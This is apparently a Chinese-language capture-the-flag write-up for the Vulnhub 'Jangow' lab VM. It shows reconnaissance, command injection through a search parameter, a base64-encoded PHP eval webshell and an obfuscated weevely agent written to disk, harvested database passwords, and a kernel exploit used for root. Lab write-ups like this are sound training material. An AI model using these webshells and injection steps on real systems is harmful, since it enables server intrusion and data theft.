Vulnhub年靶机数量
Year
Num
…
…
2018
65
2019
117
2020
223
2021
108
2022
1
难免对于一个时代的落幕感到惋惜
但同时庆幸自己能够在最好的时间参与其中
在学习的过程中享受这个过程
Thank you, Vulnhub & every author.
Thank you for what I learned and every wonderful challenge I enjoyed.
2023-02-14 06:59:27
nmap -sn 192.168.56.0/24 | grep -B 2 Virtual
1 2 3 Nmap scan report for 192.168.56.118 Host is up (0.00010s latency). MAC Address: 08:00:27:BF:BA:62 (Oracle VirtualBox virtual NIC)
nmap -sV -Pn -v -T5 -A 192.168.56.118
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 Nmap scan report for 192.168.56.118 Host is up (0.00016s latency). Not shown: 998 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 80/tcp open http Apache httpd 2.4.18 | http-methods: |_ Supported Methods: POST OPTIONS GET HEAD | http-ls: Volume / | SIZE TIME FILENAME | - 2021-06-10 18:05 site/ |_ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Index of / MAC Address: 08:00:27:BF:BA:62 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type : general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9 Uptime guess: 0.041 days (since Tue Feb 14 06:38:08 2023) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=263 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Host: 127.0.0.1; OS: Unix
dirb http://192.168.56.118/ -w
1 2 3 ---- Scanning URL: http://192.168.56.118/ ---- + http://192.168.56.118/server-status (CODE:403|SIZE:279) ==> DIRECTORY: http://192.168.56.118/site/
dirb http://192.168.56.118/site/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
1 2 3 4 5 6 ---- Scanning URL: http://192.168.56.118/site/ ---- ==> DIRECTORY: http://192.168.56.118/site/assets/ ==> DIRECTORY: http://192.168.56.118/site/css/ + http://192.168.56.118/site/index.html (CODE:200|SIZE:10190) ==> DIRECTORY: http://192.168.56.118/site/js/ ==> DIRECTORY: http://192.168.56.118/site/wordpress/
访问http://192.168.56.118/site/
点击右上角Buscar按钮跳转至http://192.168.56.118/site/busque.php?buscar=
简单测试后发现命令执行漏洞
curl http://192.168.56.118/site/busque.php?buscar=ls
1 2 3 4 5 6 assets busque.php css index.html js wordpress
以防万一,确认一下黑名单
curl 'http://192.168.56.118/site/busque.php?buscar=cat+./busque.php'
1 <?php system($_GET ['buscar' ]); ?>
确认写入权限
curl 'http://192.168.56.118/site/busque.php?buscar=ls+-la'
1 2 3 4 5 6 7 8 9 10 total 44 drwxr-xr-x 6 www-data www-data 4096 Feb 13 17:59 . drwxr-xr-x 3 root root 4096 Oct 31 2021 .. -rw-r--r-- 1 www-data www-data 1584 Feb 13 17:59 \ drwxr-xr-x 3 www-data www-data 4096 Jun 3 2021 assets -rw-r--r-- 1 www-data www-data 35 Jun 10 2021 busque.php drwxr-xr-x 2 www-data www-data 4096 Jun 3 2021 css -rw-r--r-- 1 www-data www-data 10190 Jun 10 2021 index.html drwxr-xr-x 2 www-data www-data 4096 Jun 3 2021 js drwxr-xr-x 2 www-data www-data 4096 Jun 10 2021 wordpress
curl 'http://192.168.56.118/site/busque.php?buscar=id'
1 uid=33(www-data) gid=33(www-data) groups=33(www-data)
尝试反弹Shell,失败
尝试通过Web服务传递Webshell,失败
疑似Ban了主动请求
echo -n '<?php eval($_POST["BFL"]);?>' | base64
1 PD9waHAgZXZhbCgkX1BPU1RbIkJGTCJdKTs/Pg==
1 curl 'http://192.168.56.118/site/busque.php?buscar=echo+-n+PD9waHAgZXZhbCgkX1BPU1RbIkJGTCJdKTs/Pg==|base64+-d>bfl.php'
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 weevely generate Bufferfly BFL.php cat BFL.php | base64 PD9waHAKJHo9JyRrPSI1TGJMMmNMMjhlTGMiOyRraD0iNDE1NmRiYUwwNTM1NyJMOyRrZj0iNzc3 MmYxOEwyTDg1YWIiOyRwPSJMJzsKJGw9J2JhTHNlNjRfZW5jb2RlKEBMTHhMKExAZ3pjb21McHJM ZXNzKCRvKSwkaykpO3ByaW50KCIkcCRraCRyJGtmIik7fSc7CiRBPSd0Y0xoKCIvJGtoKC4rKUwk a0xmLyIsQGZpbGVfZ2V0X2NvbnRMZW50cygicExocDovTC9pbnB1dEwiKSwkbSk9JzsKJHE9J3Js ZUxuKCRMdClMOyRvPSIiO2ZvcigkaUw9MDskaTwkbDtMTCl7Zm9Mcigkaj0wO0woJGo8JExjJiYk aTwkbCk7TCc7CiRUPSdMPTEpIEx7QG9MYl9zdGFydCgpTDtAZUx2YWwoQGd6dW5MY29tTHByZXNM cyhAeChAYkxhc2U2NExfZGVjb2RlKCQnOwokdD0nJGorTCssJGkrKyl7TCRvLj0kdEx7JGl9XiRr eyRqfUw7fX1yZUx0dXJMbiAkbzt9aWYgTChAcHJlZ19MbUxMYSc7CiRkPXN0cl9yZXBsYWNlKCdT eicsJycsJ1N6Y3JlYXRTemVfU3pTemZTenVuU3pjdGlvbicpOwokWD0nbUxbTDFdKSwkaykpKTsk TG89QG9MYl9nTGV0X2NvbnRMZW50THMoKTtAb2JfZW5MZF9jbGVMYW4oKTtMJHJMPUAnOwokdz0n RVZsNUx0dTJjNExKYXdDdXZrTEwiO2Z1bmN0aW9MbiB4KCR0LExMJGspeyRjPXN0ckxsTGVuKCRr KTskbD1zdCc7CiRmPXN0cl9yZXBsYWNlKCdMJywnJywkei4kdy4kcS4kdC4kQS4kVC4kWC4kbCk7 CiRVPSRkKCcnLCRmKTskVSgpOwo/Pgo=
1 curl 'http://192.168.56.118/site/bfl.php' --data "BFL=system('echo -n PD9waHAKJHo9JyRrPSI1TGJMMmNMMjhlTGMiOyRraD0iNDE1NmRiYUwwNTM1NyJMOyRrZj0iNzc3MmYxOEwyTDg1YWIiOyRwPSJMJzsKJGw9J2JhTHNlNjRfZW5jb2RlKEBMTHhMKExAZ3pjb21McHJMZXNzKCRvKSwkaykpO3ByaW50KCIkcCRraCRyJGtmIik7fSc7CiRBPSd0Y0xoKCIvJGtoKC4rKUwka0xmLyIsQGZpbGVfZ2V0X2NvbnRMZW50cygicExocDovTC9pbnB1dEwiKSwkbSk9JzsKJHE9J3JsZUxuKCRMdClMOyRvPSIiO2ZvcigkaUw9MDskaTwkbDtMTCl7Zm9Mcigkaj0wO0woJGo8JExjJiYkaTwkbCk7TCc7CiRUPSdMPTEpIEx7QG9MYl9zdGFydCgpTDtAZUx2YWwoQGd6dW5MY29tTHByZXNMcyhAeChAYkxhc2U2NExfZGVjb2RlKCQnOwokdD0nJGorTCssJGkrKyl7TCRvLj0kdEx7JGl9XiRreyRqfUw7fX1yZUx0dXJMbiAkbzt9aWYgTChAcHJlZ19MbUxMYSc7CiRkPXN0cl9yZXBsYWNlKCdTeicsJycsJ1N6Y3JlYXRTemVfU3pTemZTenVuU3pjdGlvbicpOwokWD0nbUxbTDFdKSwkaykpKTskTG89QG9MYl9nTGV0X2NvbnRMZW50THMoKTtAb2JfZW5MZF9jbGVMYW4oKTtMJHJMPUAnOwokdz0nRVZsNUx0dTJjNExKYXdDdXZrTEwiO2Z1bmN0aW9MbiB4KCR0LExMJGspeyRjPXN0ckxsTGVuKCRrKTskbD1zdCc7CiRmPXN0cl9yZXBsYWNlKCdMJywnJywkei4kdy4kcS4kdC4kQS4kVC4kWC4kbCk7CiRVPSRkKCcnLCRmKTskVSgpOwo/Pgo= | base64 -d > BFL.php');"
weevely http://192.168.56.118/site/BFL.php Bufferfly
算是获取了个Shell吧
cat user.txt
d41d8cd98f00b204e9800998ecf8427e
cat /var/www/html/.backup
1 2 3 4 5 6 7 8 9 10 11 12 $servername = "localhost" ;$database = "jangow01" ;$username = "jangow01" ;$password = "abygurl69" ;$conn = mysqli_connect($servername , $username , $password , $database );if (!$conn ) { die ("Connection failed: " . mysqli_connect_error()); } echo "Connected successfully" ;mysqli_close($conn );
cat /var/www/html/site/wordpress/config.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 <?php $servername = "localhost" ;$database = "desafio02" ;$username = "desafio02" ;$password = "abygurl69" ;$conn = mysqli_connect($servername , $username , $password , $database );if (!$conn ) { die ("Connection failed: " . mysqli_connect_error()); } echo "Connected successfully" ;mysqli_close($conn ); ?>
cat /etc/passwd | grep home
1 2 syslog:x:104:108::/home/syslog:/bin/false jangow01:x:1000:1000:desafio02,,,:/home/jangow01:/bin/bash
netstat里面看见了SSH,但是连不上,估计是配iptables了
在Virtualbox中登录(偷看WP的)
逛一圈后没看见什么有价值的信息
uname -a
1 Linux jangow01 4.4.0-31-generic
https://www.exploit-db.com/exploits/45010
文件保存到本地
编译
weevely中上传并赋权
1 2 :file_upload ./exp /tmp/exp chmod +x /tmp/exp
VirtualBox终端中jangow01用户运行
cat /root/proof.txt
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 @@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&& @ @@@@@@@@@@@@@@@&# #@@@@@@@@&(. /&@@@@@@@@@@ @ @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@& .&@@@@@ @ @@@@@@@& @@@@@@&@@@@@&%######%&@* ./@@* &@@ @ @@@@@* (@@@@@@@@@#/. .*@. .#&. &@@@&& @ @@@, /@@@@@@@@#, .@. ,&, @@&& @ @& @@@@@@@@#. @@@,@@@/ %. #, %@& @@@# @@@@@@@@/ .@@@@@@@@@@ * ., @@ @@& @@@@@@@@* @@@@@@@@@@@ , @ @& .@@@@@@@( @@@@@@@@@@@@@@@@@@@@@ *. &@ @@/ *@@@@@@@/ @@@@@@@@@@@# @@ @@ .@@@@@@@/ @@@@@@@@@@@@@ @# @@ @@ @@@@@@@@. @@@@@@@@@@@ @@( @@ @& .@@@@@@@@. , @@@@@@@ * .@@@*( .@ @@ ,@@@@@@@@, @@@@@@@@@&*%@@@@@@@@@, @@@@@(%&* &@ @@& @@@@@@@@@@@@@@@@@ (@@@@@@@@@@@@@@%@@/ &@ @ @& ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%* &@ @ @@. .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%* &@& @ @@@& ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/ &@@&& @ @@@@@@. *%@@@@@@@@@@@@@@@@@@@@&#/. &@@@@&& @ @@@@@@@@& JANGOW &@@@ @ &&&&&&&&&@@@& @@(&@ @. %.@ @@%@ &@@@&&&& &&&@@@@&% &/ (&&@@@&&& ((((((((((((((((((((((((((((( da39a3ee5e6b4b0d3255bfef95601890afd80709
网络问题
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 iptables -L ... Chain ufw-user-forward (1 references) target prot opt source destination Chain ufw-user-input (1 references) target prot opt source destination ACCEPT tcp -- anywhere anywhere tcp dpt:ftp ACCEPT tcp -- anywhere anywhere tcp dpt:http ACCEPT udp -- anywhere anywhere udp dpt:http Chain ufw-user-limit (0 references) target prot opt source destination LOG all -- anywhere anywhere limit: avg 3/min burst 5 LOG level warning prefix "[UFW LIMIT BLOCK] " REJECT all -- anywhere anywhere reject-with icmp-port-unreachable Chain ufw-user-limit-accept (0 references) target prot opt source destination ACCEPT all -- anywhere anywhere Chain ufw-user-logging-forward (0 references) target prot opt source destination Chain ufw-user-logging-input (0 references) target prot opt source destination Chain ufw-user-logging-output (0 references) target prot opt source destination Chain ufw-user-output (1 references) target prot opt source destination ACCEPT tcp -- anywhere anywhere tcp dpt:https ACCEPT udp -- anywhere anywhere udp dpt:https
配置iptable来Ban掉反弹Shell倒是第一次见,在这上面也确实浪费了一些时间
有SSH不用非要用VirtualBox终端登录
非常规,有点整活
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 localectl System Locale: LANG=pt_BR.UTF-8 LANGUAGE=pt_BR:pt:en LC_NUMERIC=pt_BR LC_TIME=pt_BR LC_MONETARY=pt_BR LC_PAPER=pt_BR LC_NAME=pt_BR LC_ADDRESS=pt_BR LC_TELEPHONE=pt_BR LC_MEASUREMENT=pt_BR LC_IDENTIFICATION=pt_BR VC Keymap: n/a X11 Layout: br X11 Model: a4techKB21
但是比上次的西语键盘好摁点
参考资料
WP